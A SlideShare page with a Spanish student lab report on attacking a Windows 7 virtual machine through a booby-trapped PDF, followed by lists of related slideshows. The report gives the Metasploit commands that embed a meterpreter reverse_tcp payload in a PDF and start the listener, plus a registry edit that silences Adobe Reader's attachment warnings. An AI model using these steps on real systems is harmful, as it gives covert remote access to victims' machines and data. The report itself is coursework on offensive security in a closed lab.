SlideShare una empresa de Scribd logo
1 de 8
Descargar para leer sin conexión
HACKING BACKTRACK 1

OBJETIVO DE LA PRÁCTICA

Desearemos desde un PC atacante hacer una conexión remota a un PC víctima.
Esta conexión será “malintencionada” y se realizará desde el puerto 4444 a través del Sistema
Operativo Backtrack creando un archivo .PDF infectado y enviándolo al PC víctima.
Una vez el PC victima abra el archivo, se abrirá un backdoor y desde el PC atacante podremos
acceder a la Shell de la víctima y podremos visualizar todo su contenido.

DETALLES A TENER EN CUENTA

La realización de esta práctica ha supuesto unas complicaciones externas debido a algunos
detalles que explicaremos a continuación.







Trabajaremos con MSFConsole en el entorno Backtrack.
Cuando se crea el PDF, tenemos que agregar la IP del Atacante en el comando lhost.
La versión de Adobe Reader que debe tener el cliente será la 9.0.
Se han editado los registros de Adobe Reader para permitir el uso del .exe.
Se ignorará el hecho de realizar la conexión con el puerto 443.
La víctima debe tener desactivado el Firewall.
ESQUEMA DE LA PRÁCTICA

Equipo atacante = 192.168.1.2
Equipo víctima = 192.168.1.3
Como podemos ver en el dibujo, ambos PCs deben estar conectados en la misma red para
realizarse el ataque. Para ello los hemos puesto a ambos en una VMnet juntos.
El Equipo víctima será quien tenga el .PDF infectado y quien será atacado por el equipo 1.2.

PROCEDIMIENTO DE LA PRÁCTICA

Para empezar la práctica, primero de todos tendremos que contar con un sistema operativo
llamado Backtrack, basado en distribuciones Linux. Este O.S. es una herramienta bastante
particular basada en este tipo de ejemplos y prácticas en cuanto a “jugar” con la red.
El primer paso será crear un archivo .PDF. Éste será la base de nuestro ataque. Gracias a él
podremos infectar a la víctima una vez abra el archivo que le enviaremos.
Abriremos la terminal del Backtrack y utilizaremos la MSFConsole. Esta consola se centra y
permite un acceso eficiente a las opciones relacionadas con los Exploits que se utilizarán.
Gracias a ésta, se facilita el uso de las herramientas.
CREACIÓN DEL PDF…

A la hora de crear el PDF, tenemos que tener en cuenta los siguientes comandos (que
utilizaremos):


use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs.
Sirve para decirle que vamos a utilizer un exploit con Adobe PDF embedded y un .exe como
extensión.



set payload windows/meterpreter/reverse_tcp
Es el Payload, que nos devolverá un Meterpreter. El Payload traducido es la carga útil, es la
información del envío de datos que usaremos para el ataque.



set lhost 192.168.1.2.
Añadiremos la IP del Atacante.



set filename vellimalote.pdf
Crearemos un PDF con el nombre indicado.



Exploit
Cargaremos el exploit para que se cree.
TRANSMISIÓN DEL ARCHIVO

Ahora, de cualquier forma tenemos que conseguir que la víctima reciba dicho archivo PDF
creado.
En este paso nosotros directamente lo hemos enviado o traspasado por un USB para facilitar el
uso de éste.
Localizaremos el archivo, en la ruta donde se ha guardado:
/msf4/local/vellimalote.pdf

*Hay dos archivos, vellimalo y vellimalote porque se hicieron varias pruebas. Pero el que nos
servirá y estamos utilizando es Vellimalote.pdf
Enviaremos el archivo a la máquina Windows 7, que será la víctima:

Hay que tener en cuenta, que la víctima debe tener un Adobe Reader inferior a la versión 9.3.
En nuestro caso utilizaremos la 9.0, que no dará muchos problemas a la hora de realizar la
apertura del archivo.
DETALLES DE ADOBE READER

La realización de la práctica ha sido ardua básicamente por los permisos y versiones de Adobe
Reader.
Para que funcionara 100% hemos hecho unos cambios, encontrados en Internet.


Actualizar el registro de Adobe Reader.
Después de una búsqueda exhaustiva por Internet, muchos usuarios coincidían en que
el registro de Adobe Reader debía ser cambiado.
Para ello utilizaremos la herramienta de Windows, “regedit” y seguiremos la siguiente
ruta:
HKEY_LOCAL_Machine / Software / Policies / Adobe / Acrobat Reader / 9.0 /
FeatureLockDown / cDefaultLaunchAttachmentPerms
Una vez dentro, veremos esto:

Editaremos el registro “BuiltInPermList” y le quitaremos la extensión .exe.
De esta forma, cuando abramos el archivo PDF no nos surgirá ningún mensaje molesto
relacionado con la infección o el mal uso del archivo.
EMPIEZA EL ATAQUE

Una vez solucionados todos los problemas con la víctima, realizaremos el ataque desde
nuestro atacante, valga la redundancia.
Utilizaremos los siguientes comandos:

 Use exploit/multi/handler
Utilizaremos el controlador del Exploit.

 Set payload Windows/meterpreter/reverse_tcp
Utilización del TCP (lo mismo que cuando creamos el PDF).

 Set lhost 192.168.1.2
Agregamos la IP del atacante.

 Exploit
Arrancamos el exploit.

El ataque será enviado mediante escucha. Es decir, que cuando la víctima abra el archivo
infectado (enviado anteriormente, el PDF) será cuando el atacante podrá entrar en la Shell del
usuario y entonces el ataque habrá sido realizado correctamente.
MODO ESCUCHA

La víctima abrirá el archivo PDF y comprobará que le sale una terminal extraña, que
desaparecerá al momento.
Cuando el usuario víctima ve esto, en la mayoría de los casos se despreocupa y sigue realizando
las tareas que estaba haciendo, pero realmente este ha sido el momento de infección, ya que el
atacante ha podido realizar la conexión.

El atacante estará esperando (modo escucha) y verá cómo se crea la conexión:
Dentro del parámetro meterpreter, ponemos “Shell” para meternos dentro del PC de la
víctima, sin que éste se dé cuenta de nada.

Y como podemos ver, ya estamos dentro del Desktop de la víctima:

A partir de ahora podemos navegar por el PC de la víctima y realizar maldades o simplemente
ser un cotilla y ver toda la información que tiene el usuario.

José Mª Vellido – ASIX2M
Hacking Backtrack 1 – SEGDISP
Fran Pérez – 2013/2014

Más contenido relacionado

La actualidad más candente

Meterpreter en android el desembarco en tu smartphone
Meterpreter en android   el desembarco en tu smartphoneMeterpreter en android   el desembarco en tu smartphone
Meterpreter en android el desembarco en tu smartphone
JASENT
 
Instalar php 5 en windows 7 con apache
Instalar php 5 en windows 7 con apacheInstalar php 5 en windows 7 con apache
Instalar php 5 en windows 7 con apache
Esmeralda Lopez
 

La actualidad más candente (18)

Aironux El Sustituto De Ares Para Linux
Aironux El Sustituto De Ares Para Linux
Aironux El Sustituto De Ares Para Linux
Aironux El Sustituto De Ares Para Linux
 
Penetración con una Backdoor
Penetración con una BackdoorPenetración con una Backdoor
Penetración con una Backdoor
 
Instalar Robocup Windows
Instalar Robocup WindowsInstalar Robocup Windows
Instalar Robocup Windows
 
Ataque DNS Spoofing
Ataque DNS SpoofingAtaque DNS Spoofing
Ataque DNS Spoofing
 
Linux
LinuxLinux
Linux
 
Ethical hacking 03
Ethical hacking 03Ethical hacking 03
Ethical hacking 03
 
Ethical hacking 02
Ethical hacking 02Ethical hacking 02
Ethical hacking 02
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
Proyectos JAVA con maven
Proyectos JAVA con mavenProyectos JAVA con maven
Proyectos JAVA con maven
 
Linux
LinuxLinux
Linux
 
Pasos para instalar windows 7
Pasos para instalar windows 7Pasos para instalar windows 7
Pasos para instalar windows 7
 
Meterpreter en android el desembarco en tu smartphone
Meterpreter en android   el desembarco en tu smartphoneMeterpreter en android   el desembarco en tu smartphone
Meterpreter en android el desembarco en tu smartphone
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebas
 
Subiendo shell explotando lfi via php input
Subiendo shell explotando lfi via php   inputSubiendo shell explotando lfi via php   input
Subiendo shell explotando lfi via php input
 
Ataque Dns spoofing
Ataque Dns spoofingAtaque Dns spoofing
Ataque Dns spoofing
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
 
Instalar php 5 en windows 7 con apache
Instalar php 5 en windows 7 con apacheInstalar php 5 en windows 7 con apache
Instalar php 5 en windows 7 con apache
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
 

Destacado

Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2
Francesc Perez
 
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Francesc Perez
 
Conmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTPConmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTP
Francesc Perez
 
Proyecto: Seguridad en redes informáticas
Proyecto: Seguridad en redes informáticasProyecto: Seguridad en redes informáticas
Proyecto: Seguridad en redes informáticas
Francesc Perez
 
Fundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicación
Fundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicaciónFundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicación
Fundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicación
Francesc Perez
 
Fundamentos de redes: 4. La capa de transporte del modelo OSI
Fundamentos de redes: 4. La capa de transporte del modelo OSIFundamentos de redes: 4. La capa de transporte del modelo OSI
Fundamentos de redes: 4. La capa de transporte del modelo OSI
Francesc Perez
 
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Francesc Perez
 
File Transfer Protocol
File Transfer ProtocolFile Transfer Protocol
File Transfer Protocol
Francesc Perez
 
Dynamic Host Configuration Protocol
Dynamic Host Configuration ProtocolDynamic Host Configuration Protocol
Dynamic Host Configuration Protocol
Francesc Perez
 
Fundamentos de redes: 2. Comunicación a través de la red
Fundamentos de redes: 2. Comunicación a través de la redFundamentos de redes: 2. Comunicación a través de la red
Fundamentos de redes: 2. Comunicación a través de la red
Francesc Perez
 

Destacado (20)

Enrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 solEnrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 sol
 
ICT Parte 1/2
ICT Parte 1/2ICT Parte 1/2
ICT Parte 1/2
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2
 
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
 
Unicode - Hacking The International Character System
Unicode - Hacking The International Character SystemUnicode - Hacking The International Character System
Unicode - Hacking The International Character System
 
Js api formularios
Js api formulariosJs api formularios
Js api formularios
 
Conmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTPConmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTP
 
Exercici html5, js y css3
Exercici html5, js y css3Exercici html5, js y css3
Exercici html5, js y css3
 
Proyecto: Seguridad en redes informáticas
Proyecto: Seguridad en redes informáticasProyecto: Seguridad en redes informáticas
Proyecto: Seguridad en redes informáticas
 
1a seguridad informatica
1a seguridad informatica1a seguridad informatica
1a seguridad informatica
 
Virus y vacunas informáaticas
Virus y vacunas informáaticasVirus y vacunas informáaticas
Virus y vacunas informáaticas
 
Trabajo práctico n° 3 seguridad informática
Trabajo práctico n° 3 seguridad informáticaTrabajo práctico n° 3 seguridad informática
Trabajo práctico n° 3 seguridad informática
 
Seguridad informatica
Seguridad informatica Seguridad informatica
Seguridad informatica
 
Hoja de vida
Hoja de vidaHoja de vida
Hoja de vida
 
Fundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicación
Fundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicaciónFundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicación
Fundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicación
 
Fundamentos de redes: 4. La capa de transporte del modelo OSI
Fundamentos de redes: 4. La capa de transporte del modelo OSIFundamentos de redes: 4. La capa de transporte del modelo OSI
Fundamentos de redes: 4. La capa de transporte del modelo OSI
 
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
 
File Transfer Protocol
File Transfer ProtocolFile Transfer Protocol
File Transfer Protocol
 
Dynamic Host Configuration Protocol
Dynamic Host Configuration ProtocolDynamic Host Configuration Protocol
Dynamic Host Configuration Protocol
 
Fundamentos de redes: 2. Comunicación a través de la red
Fundamentos de redes: 2. Comunicación a través de la redFundamentos de redes: 2. Comunicación a través de la red
Fundamentos de redes: 2. Comunicación a través de la red
 

Similar a Seguridad: Backtrack1_bis

Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3
Brat Stell
 
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...
Yolanda Ruiz Hervás
 
Linux ud13 - iniciar sesion en linux de forma remota
Linux   ud13 - iniciar sesion en linux de forma remotaLinux   ud13 - iniciar sesion en linux de forma remota
Linux ud13 - iniciar sesion en linux de forma remota
Javier Muñoz
 
Presentacion re y_des_09072003
Presentacion re y_des_09072003Presentacion re y_des_09072003
Presentacion re y_des_09072003
Alonso Caballero
 
97132962-instalacion-de-open meetings-en-squeeze
 97132962-instalacion-de-open meetings-en-squeeze 97132962-instalacion-de-open meetings-en-squeeze
97132962-instalacion-de-open meetings-en-squeeze
xavazquez
 
Servidor WEB
Servidor WEBServidor WEB
Servidor WEB
Lenidav
 

Similar a Seguridad: Backtrack1_bis (20)

Presentacion eduin gonzalez
Presentacion eduin gonzalezPresentacion eduin gonzalez
Presentacion eduin gonzalez
 
Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3
 
Cuckoosandbox
CuckoosandboxCuckoosandbox
Cuckoosandbox
 
Instalación KOHA: desarrollo, requerimientos y configuración
Instalación KOHA: desarrollo, requerimientos y configuraciónInstalación KOHA: desarrollo, requerimientos y configuración
Instalación KOHA: desarrollo, requerimientos y configuración
 
Ataque win xp
Ataque win xpAtaque win xp
Ataque win xp
 
PelicanHPC Implementación fisica con dos nodos
PelicanHPC Implementación fisica con dos nodosPelicanHPC Implementación fisica con dos nodos
PelicanHPC Implementación fisica con dos nodos
 
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...
 
Linux ud13 - iniciar sesion en linux de forma remota
Linux   ud13 - iniciar sesion en linux de forma remotaLinux   ud13 - iniciar sesion en linux de forma remota
Linux ud13 - iniciar sesion en linux de forma remota
 
Sallis Usb Hacks
Sallis Usb HacksSallis Usb Hacks
Sallis Usb Hacks
 
Pent box security suite
Pent box security suitePent box security suite
Pent box security suite
 
Presentacion re y_des_09072003
Presentacion re y_des_09072003Presentacion re y_des_09072003
Presentacion re y_des_09072003
 
97132962-instalacion-de-open meetings-en-squeeze
 97132962-instalacion-de-open meetings-en-squeeze 97132962-instalacion-de-open meetings-en-squeeze
97132962-instalacion-de-open meetings-en-squeeze
 
Pent box security
Pent box securityPent box security
Pent box security
 
Pent box security
Pent box securityPent box security
Pent box security
 
Pent box security
Pent box securityPent box security
Pent box security
 
Pent box security
Pent box securityPent box security
Pent box security
 
Pent box security
Pent box securityPent box security
Pent box security
 
John the Ripper
John the RipperJohn the Ripper
John the Ripper
 
Present3
Present3Present3
Present3
 
Servidor WEB
Servidor WEBServidor WEB
Servidor WEB
 

Más de Francesc Perez

Conmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP SoluciónConmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP Solución
Francesc Perez
 
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Francesc Perez
 
Sistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: MultiplexadorSistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: Multiplexador
Francesc Perez
 
Sistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de booleSistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de boole
Francesc Perez
 
Sistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de booleSistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de boole
Francesc Perez
 
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informáticaSeguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Francesc Perez
 
La fuente de alimentación
La fuente de alimentación  La fuente de alimentación
La fuente de alimentación
Francesc Perez
 
Componentes de un sistema informático
Componentes de un sistema informáticoComponentes de un sistema informático
Componentes de un sistema informático
Francesc Perez
 

Más de Francesc Perez (20)

Conmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP SoluciónConmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP Solución
 
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
 
Sistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: MultiplexadorSistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: Multiplexador
 
Ejercicios funciones lógicas
Ejercicios funciones lógicasEjercicios funciones lógicas
Ejercicios funciones lógicas
 
Sistemas electrónicos digitales pràctica 1
Sistemas electrónicos digitales   pràctica 1Sistemas electrónicos digitales   pràctica 1
Sistemas electrónicos digitales pràctica 1
 
html5 multimedia
 html5 multimedia html5 multimedia
html5 multimedia
 
Sistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de booleSistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de boole
 
Estudio del PC
Estudio del PCEstudio del PC
Estudio del PC
 
Sistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de booleSistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de boole
 
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informáticaSeguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
 
La fuente de alimentación
La fuente de alimentación  La fuente de alimentación
La fuente de alimentación
 
Componentes de un sistema informático
Componentes de un sistema informáticoComponentes de un sistema informático
Componentes de un sistema informático
 
Javascript
JavascriptJavascript
Javascript
 
css3
css3css3
css3
 
html5
html5html5
html5
 
Introducción al desarrollo de aplicaciones para dispositivos móviles
Introducción al desarrollo de aplicaciones para dispositivos móvilesIntroducción al desarrollo de aplicaciones para dispositivos móviles
Introducción al desarrollo de aplicaciones para dispositivos móviles
 
Fuente de alimentación y osciloscopio (ewb)
Fuente de alimentación y osciloscopio (ewb)Fuente de alimentación y osciloscopio (ewb)
Fuente de alimentación y osciloscopio (ewb)
 
Manual ewb
Manual ewbManual ewb
Manual ewb
 
Circuitos capacitivos practia 1
Circuitos capacitivos   practia 1Circuitos capacitivos   practia 1
Circuitos capacitivos practia 1
 
Amplificador operacional practica 1
Amplificador operacional  practica 1Amplificador operacional  practica 1
Amplificador operacional practica 1
 

Último

FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURAFORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
El Fortí
 
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdf
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdfCurso = Metodos Tecnicas y Modelos de Enseñanza.pdf
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdf
Francisco158360
 
PLAN DE REFUERZO ESCOLAR primaria (1).docx
PLAN DE REFUERZO ESCOLAR primaria (1).docxPLAN DE REFUERZO ESCOLAR primaria (1).docx
PLAN DE REFUERZO ESCOLAR primaria (1).docx
lupitavic
 

Último (20)

Ley 21.545 - Circular Nº 586.pdf circular
Ley 21.545 - Circular Nº 586.pdf circularLey 21.545 - Circular Nº 586.pdf circular
Ley 21.545 - Circular Nº 586.pdf circular
 
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURAFORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
 
MAYO 1 PROYECTO día de la madre el amor más grande
MAYO 1 PROYECTO día de la madre el amor más grandeMAYO 1 PROYECTO día de la madre el amor más grande
MAYO 1 PROYECTO día de la madre el amor más grande
 
Estrategias de enseñanza-aprendizaje virtual.pptx
Estrategias de enseñanza-aprendizaje virtual.pptxEstrategias de enseñanza-aprendizaje virtual.pptx
Estrategias de enseñanza-aprendizaje virtual.pptx
 
OCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VS
OCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VSOCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VS
OCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VS
 
Sesión de aprendizaje Planifica Textos argumentativo.docx
Sesión de aprendizaje Planifica Textos argumentativo.docxSesión de aprendizaje Planifica Textos argumentativo.docx
Sesión de aprendizaje Planifica Textos argumentativo.docx
 
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdf
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdfCurso = Metodos Tecnicas y Modelos de Enseñanza.pdf
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdf
 
PLAN DE REFUERZO ESCOLAR primaria (1).docx
PLAN DE REFUERZO ESCOLAR primaria (1).docxPLAN DE REFUERZO ESCOLAR primaria (1).docx
PLAN DE REFUERZO ESCOLAR primaria (1).docx
 
Tema 8.- PROTECCION DE LOS SISTEMAS DE INFORMACIÓN.pdf
Tema 8.- PROTECCION DE LOS SISTEMAS DE INFORMACIÓN.pdfTema 8.- PROTECCION DE LOS SISTEMAS DE INFORMACIÓN.pdf
Tema 8.- PROTECCION DE LOS SISTEMAS DE INFORMACIÓN.pdf
 
Imperialismo informal en Europa y el imperio
Imperialismo informal en Europa y el imperioImperialismo informal en Europa y el imperio
Imperialismo informal en Europa y el imperio
 
plande accion dl aula de innovación pedagogica 2024.pdf
plande accion dl aula de innovación pedagogica 2024.pdfplande accion dl aula de innovación pedagogica 2024.pdf
plande accion dl aula de innovación pedagogica 2024.pdf
 
CALENDARIZACION DE MAYO / RESPONSABILIDAD
CALENDARIZACION DE MAYO / RESPONSABILIDADCALENDARIZACION DE MAYO / RESPONSABILIDAD
CALENDARIZACION DE MAYO / RESPONSABILIDAD
 
actividades comprensión lectora para 3° grado
actividades comprensión lectora para 3° gradoactividades comprensión lectora para 3° grado
actividades comprensión lectora para 3° grado
 
Registro Auxiliar - Primaria 2024 (1).pptx
Registro Auxiliar - Primaria  2024 (1).pptxRegistro Auxiliar - Primaria  2024 (1).pptx
Registro Auxiliar - Primaria 2024 (1).pptx
 
Fe contra todo pronóstico. La fe es confianza.
Fe contra todo pronóstico. La fe es confianza.Fe contra todo pronóstico. La fe es confianza.
Fe contra todo pronóstico. La fe es confianza.
 
Unidad 3 | Metodología de la Investigación
Unidad 3 | Metodología de la InvestigaciónUnidad 3 | Metodología de la Investigación
Unidad 3 | Metodología de la Investigación
 
TIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptx
TIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptxTIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptx
TIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptx
 
origen y desarrollo del ensayo literario
origen y desarrollo del ensayo literarioorigen y desarrollo del ensayo literario
origen y desarrollo del ensayo literario
 
Estrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcciónEstrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcción
 
Presentacion Metodología de Enseñanza Multigrado
Presentacion Metodología de Enseñanza MultigradoPresentacion Metodología de Enseñanza Multigrado
Presentacion Metodología de Enseñanza Multigrado
 

Seguridad: Backtrack1_bis

  • 1. HACKING BACKTRACK 1 OBJETIVO DE LA PRÁCTICA Desearemos desde un PC atacante hacer una conexión remota a un PC víctima. Esta conexión será “malintencionada” y se realizará desde el puerto 4444 a través del Sistema Operativo Backtrack creando un archivo .PDF infectado y enviándolo al PC víctima. Una vez el PC victima abra el archivo, se abrirá un backdoor y desde el PC atacante podremos acceder a la Shell de la víctima y podremos visualizar todo su contenido. DETALLES A TENER EN CUENTA La realización de esta práctica ha supuesto unas complicaciones externas debido a algunos detalles que explicaremos a continuación.       Trabajaremos con MSFConsole en el entorno Backtrack. Cuando se crea el PDF, tenemos que agregar la IP del Atacante en el comando lhost. La versión de Adobe Reader que debe tener el cliente será la 9.0. Se han editado los registros de Adobe Reader para permitir el uso del .exe. Se ignorará el hecho de realizar la conexión con el puerto 443. La víctima debe tener desactivado el Firewall.
  • 2. ESQUEMA DE LA PRÁCTICA Equipo atacante = 192.168.1.2 Equipo víctima = 192.168.1.3 Como podemos ver en el dibujo, ambos PCs deben estar conectados en la misma red para realizarse el ataque. Para ello los hemos puesto a ambos en una VMnet juntos. El Equipo víctima será quien tenga el .PDF infectado y quien será atacado por el equipo 1.2. PROCEDIMIENTO DE LA PRÁCTICA Para empezar la práctica, primero de todos tendremos que contar con un sistema operativo llamado Backtrack, basado en distribuciones Linux. Este O.S. es una herramienta bastante particular basada en este tipo de ejemplos y prácticas en cuanto a “jugar” con la red. El primer paso será crear un archivo .PDF. Éste será la base de nuestro ataque. Gracias a él podremos infectar a la víctima una vez abra el archivo que le enviaremos. Abriremos la terminal del Backtrack y utilizaremos la MSFConsole. Esta consola se centra y permite un acceso eficiente a las opciones relacionadas con los Exploits que se utilizarán. Gracias a ésta, se facilita el uso de las herramientas.
  • 3. CREACIÓN DEL PDF… A la hora de crear el PDF, tenemos que tener en cuenta los siguientes comandos (que utilizaremos):  use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs. Sirve para decirle que vamos a utilizer un exploit con Adobe PDF embedded y un .exe como extensión.  set payload windows/meterpreter/reverse_tcp Es el Payload, que nos devolverá un Meterpreter. El Payload traducido es la carga útil, es la información del envío de datos que usaremos para el ataque.  set lhost 192.168.1.2. Añadiremos la IP del Atacante.  set filename vellimalote.pdf Crearemos un PDF con el nombre indicado.  Exploit Cargaremos el exploit para que se cree.
  • 4. TRANSMISIÓN DEL ARCHIVO Ahora, de cualquier forma tenemos que conseguir que la víctima reciba dicho archivo PDF creado. En este paso nosotros directamente lo hemos enviado o traspasado por un USB para facilitar el uso de éste. Localizaremos el archivo, en la ruta donde se ha guardado: /msf4/local/vellimalote.pdf *Hay dos archivos, vellimalo y vellimalote porque se hicieron varias pruebas. Pero el que nos servirá y estamos utilizando es Vellimalote.pdf Enviaremos el archivo a la máquina Windows 7, que será la víctima: Hay que tener en cuenta, que la víctima debe tener un Adobe Reader inferior a la versión 9.3. En nuestro caso utilizaremos la 9.0, que no dará muchos problemas a la hora de realizar la apertura del archivo.
  • 5. DETALLES DE ADOBE READER La realización de la práctica ha sido ardua básicamente por los permisos y versiones de Adobe Reader. Para que funcionara 100% hemos hecho unos cambios, encontrados en Internet.  Actualizar el registro de Adobe Reader. Después de una búsqueda exhaustiva por Internet, muchos usuarios coincidían en que el registro de Adobe Reader debía ser cambiado. Para ello utilizaremos la herramienta de Windows, “regedit” y seguiremos la siguiente ruta: HKEY_LOCAL_Machine / Software / Policies / Adobe / Acrobat Reader / 9.0 / FeatureLockDown / cDefaultLaunchAttachmentPerms Una vez dentro, veremos esto: Editaremos el registro “BuiltInPermList” y le quitaremos la extensión .exe. De esta forma, cuando abramos el archivo PDF no nos surgirá ningún mensaje molesto relacionado con la infección o el mal uso del archivo.
  • 6. EMPIEZA EL ATAQUE Una vez solucionados todos los problemas con la víctima, realizaremos el ataque desde nuestro atacante, valga la redundancia. Utilizaremos los siguientes comandos:  Use exploit/multi/handler Utilizaremos el controlador del Exploit.  Set payload Windows/meterpreter/reverse_tcp Utilización del TCP (lo mismo que cuando creamos el PDF).  Set lhost 192.168.1.2 Agregamos la IP del atacante.  Exploit Arrancamos el exploit. El ataque será enviado mediante escucha. Es decir, que cuando la víctima abra el archivo infectado (enviado anteriormente, el PDF) será cuando el atacante podrá entrar en la Shell del usuario y entonces el ataque habrá sido realizado correctamente.
